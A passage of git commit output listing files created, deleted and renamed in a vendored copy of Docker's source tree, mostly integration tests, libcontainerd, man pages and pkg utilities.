vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_test_vars.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/environment/environment.go rename vendor/github.com/docker/docker/integration-cli/{events_utils.go => events_utils_test.go} (98%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key delete mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default rename vendor/github.com/docker/docker/integration-cli/{fixtures_linux_daemon.go => fixtures_linux_daemon_test.go} (79%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/registry.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/registry_mock.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirement/requirement.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/requirements.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go rename vendor/github.com/docker/docker/integration-cli/{test_vars_exec.go => test_vars_exec_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_noexec.go => test_vars_noexec_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_noseccomp.go => test_vars_noseccomp_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_seccomp.go => test_vars_seccomp_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars.go => test_vars_test.go} (90%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_unix.go => test_vars_unix_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_windows.go => test_vars_windows_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{fixtures/load => testdata}/emptyLayer.tar (100%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/trust_server.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/utils_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/build_session_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/build_squash_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/build_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/config/config_test.go create mode 100644 vendor/github.com/docker/docker/integration/config/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/copy_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/create_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/daemon_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/diff_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/exec_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/export_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/health_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/kill_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/links_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/logs_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/mounts_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/nat_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/pause_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/ps_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/remove_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/rename_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/resize_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/restart_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/stats_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/stop_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/update_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/update_test.go create mode 100644 vendor/github.com/docker/docker/integration/doc.go create mode 100644 vendor/github.com/docker/docker/integration/image/commit_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/import_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/remove_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/tag_test.go create mode 100644 vendor/github.com/docker/docker/integration/internal/container/container.go create mode 100644 vendor/github.com/docker/docker/integration/internal/container/exec.go create mode 100644 vendor/github.com/docker/docker/integration/internal/container/ops.go create mode 100644 vendor/github.com/docker/docker/integration/internal/container/states.go create mode 100644 vendor/github.com/docker/docker/integration/internal/network/network.go create mode 100644 vendor/github.com/docker/docker/integration/internal/network/ops.go create mode 100644 vendor/github.com/docker/docker/integration/internal/requirement/requirement.go create mode 100644 vendor/github.com/docker/docker/integration/internal/swarm/service.go create mode 100644 vendor/github.com/docker/docker/integration/network/delete_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/helpers.go create mode 100644 vendor/github.com/docker/docker/integration/network/inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/macvlan/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/service_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/main_test.go rename vendor/github.com/docker/docker/{integration-cli/docker_cli_external_graphdriver_unix_test.go => integration/plugin/graphdriver/external_test.go} (50%) create mode 100644 vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/pkg_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go create mode 100644 vendor/github.com/docker/docker/integration/secret/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/secret/secret_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/create_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/network_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/plugin_test.go create mode 100644 vendor/github.com/docker/docker/integration/session/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/session/session_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/event_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/info_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/info_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/login_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/version_test.go create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/ca.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/client-key.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/server-key.pem create mode 100644 vendor/github.com/docker/docker/integration/volume/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/volume/volume_test.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/config.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/container.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/node.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/ops.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/plugin.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/secret.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/service.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/swarm.go create mode 100644 vendor/github.com/docker/docker/internal/test/environment/clean.go create mode 100644 vendor/github.com/docker/docker/internal/test/environment/environment.go create mode 100644 vendor/github.com/docker/docker/internal/test/environment/protect.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakecontext/context.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakestorage/storage.go rename vendor/github.com/docker/docker/{integration-cli => internal/test}/fixtures/load/frozen.go (60%) create mode 100644 vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go create mode 100644 vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go create mode 100644 vendor/github.com/docker/docker/internal/test/helper.go create mode 100644 vendor/github.com/docker/docker/internal/test/registry/ops.go create mode 100644 vendor/github.com/docker/docker/internal/test/registry/registry.go create mode 100644 vendor/github.com/docker/docker/internal/test/registry/registry_mock.go rename vendor/github.com/docker/docker/{integration-cli => internal/test/request}/npipe.go (91%) rename vendor/github.com/docker/docker/{integration-cli => internal/test/request}/npipe_windows.go (91%) create mode 100644 vendor/github.com/docker/docker/internal/test/request/ops.go create mode 100644 vendor/github.com/docker/docker/internal/test/request/request.go create mode 100644 vendor/github.com/docker/docker/internal/testutil/helpers.go create mode 100644 vendor/github.com/docker/docker/internal/testutil/stringutils.go create mode 100644 vendor/github.com/docker/docker/internal/testutil/stringutils_test.go create mode 100644 vendor/github.com/docker/docker/layer/filestore_unix.go create mode 100644 vendor/github.com/docker/docker/layer/filestore_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_local_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_solaris.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/errors.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_linux.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_solaris.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/process.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/process_unix.go rename vendor/github.com/docker/docker/libcontainerd/{queue_unix.go => queue.go} (70%) create mode 100644 vendor/github.com/docker/docker/libcontainerd/queue_test.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_local.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/types_solaris.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_solaris.go delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.5.md delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.aarch64 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.armhf delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.ppc64le delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.s390x delete mode 100644 vendor/github.com/docker/docker/man/README.md delete mode 100644 vendor/github.com/docker/docker/man/docker-attach.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-build.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-commit.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-config-json.5.md delete mode 100644 vendor/github.com/docker/docker/man/docker-cp.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-create.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-diff.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-events.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-exec.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-export.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-history.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-images.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-import.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-info.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-inspect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-kill.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-load.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-login.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-logout.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-logs.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-connect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-create.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-disconnect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-inspect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-ls.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-rm.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-pause.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-port.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-ps.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-pull.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-push.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-rename.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-restart.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-rm.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-rmi.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-run.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-save.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-search.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-start.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-stats.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-stop.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-tag.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-top.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-unpause.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-update.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-version.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-wait.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker.1.md delete mode 100644 vendor/github.com/docker/docker/man/dockerd.8.md delete mode 100644 vendor/github.com/docker/docker/man/generate.go delete mode 100755 vendor/github.com/docker/docker/man/generate.sh delete mode 100644 vendor/github.com/docker/docker/man/glide.lock delete mode 100644 vendor/github.com/docker/docker/man/glide.yaml delete mode 100755 vendor/github.com/docker/docker/man/md2man-all.sh rename vendor/github.com/docker/docker/oci/{defaults_linux.go => defaults.go} (58%) delete mode 100644 vendor/github.com/docker/docker/oci/defaults_solaris.go delete mode 100644 vendor/github.com/docker/docker/oci/defaults_windows.go create mode 100644 vendor/github.com/docker/docker/opts/address_pools.go create mode 100644 vendor/github.com/docker/docker/opts/address_pools_test.go create mode 100644 vendor/github.com/docker/docker/opts/env.go create mode 100644 vendor/github.com/docker/docker/opts/env_test.go delete mode 100644 vendor/github.com/docker/docker/opts/mount.go delete mode 100644 vendor/github.com/docker/docker/opts/mount_test.go delete mode 100644 vendor/github.com/docker/docker/opts/port.go delete mode 100644 vendor/github.com/docker/docker/opts/port_test.go rename vendor/github.com/docker/docker/{runconfig => }/opts/runtime.go (97%) delete mode 100644 vendor/github.com/docker/docker/opts/secret.go delete mode 100644 vendor/github.com/docker/docker/opts/secret_test.go rename vendor/github.com/docker/docker/{runconfig => }/opts/ulimit.go (65%) rename vendor/github.com/docker/docker/{runconfig => }/opts/ulimit_test.go (94%) create mode 100644 vendor/github.com/docker/docker/pkg/authorization/api_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/archiver.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go rename vendor/github.com/docker/docker/pkg/devicemapper/{devmapper_wrapper_deferred_remove.go => devmapper_wrapper_dynamic_deferred_remove.go} (75%) create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go create mode 100644 vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils.go delete mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/unsupported.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_others.go rename vendor/github.com/docker/docker/pkg/homedir/{homedir.go => homedir_unix.go} (75%) create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils.go delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/utils.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/utils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt.go delete mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_int8.go delete mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go delete mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/promise/promise.go delete mode 100644 vendor/github.com/docker/docker/pkg/random/random.go delete mode 100644 vendor/github.com/docker/docker/pkg/random/random_test.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/reexec_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar.go delete mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar_test.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_test.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/testfiles/main.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/README.md delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils.go delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/system/events_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/init.go create mode 100644 vendor/github.com/docker/docker/pkg/system/init_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/init_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow_windows.go rename vendor/github.com/docker/docker/pkg/system/{lstat.go => lstat_unix.go} (84%) delete mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path.go delete mode 100644 vendor/github.com/docker/docker/pkg/system/path_unix.go delete mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows.go rename vendor/github.com/docker/docker/{utils => pkg/system}/process_unix.go (50%) create mode 100644 vendor/github.com/docker/docker/pkg/system/process_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/rm.go create mode 100644 vendor/github.com/docker/docker/pkg/system/rm_test.go rename vendor/github.com/docker/docker/pkg/system/{stat.go => stat_unix.go} (63%) delete mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/term/proxy.go create mode 100644 vendor/github.com/docker/docker/pkg/term/proxy_test.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_other.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/term_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/term_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_bsd.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_darwin.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_freebsd.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_openbsd.go create mode 100644 vendor/github.com/docker/docker/pkg/term/winsize.go delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/assert/assert.go delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/pkg.go delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go create mode 100644 vendor/github.com/docker/docker/plugin/backend_linux_test.go create mode 100644 vendor/github.com/docker/docker/plugin/errors.go create mode 100644 vendor/github.com/docker/docker/plugin/events.go create mode 100644 vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go create mode 100644 vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_linux_test.go delete mode 100644 vendor/github.com/docker/docker/plugin/manager_solaris.go create mode 100644 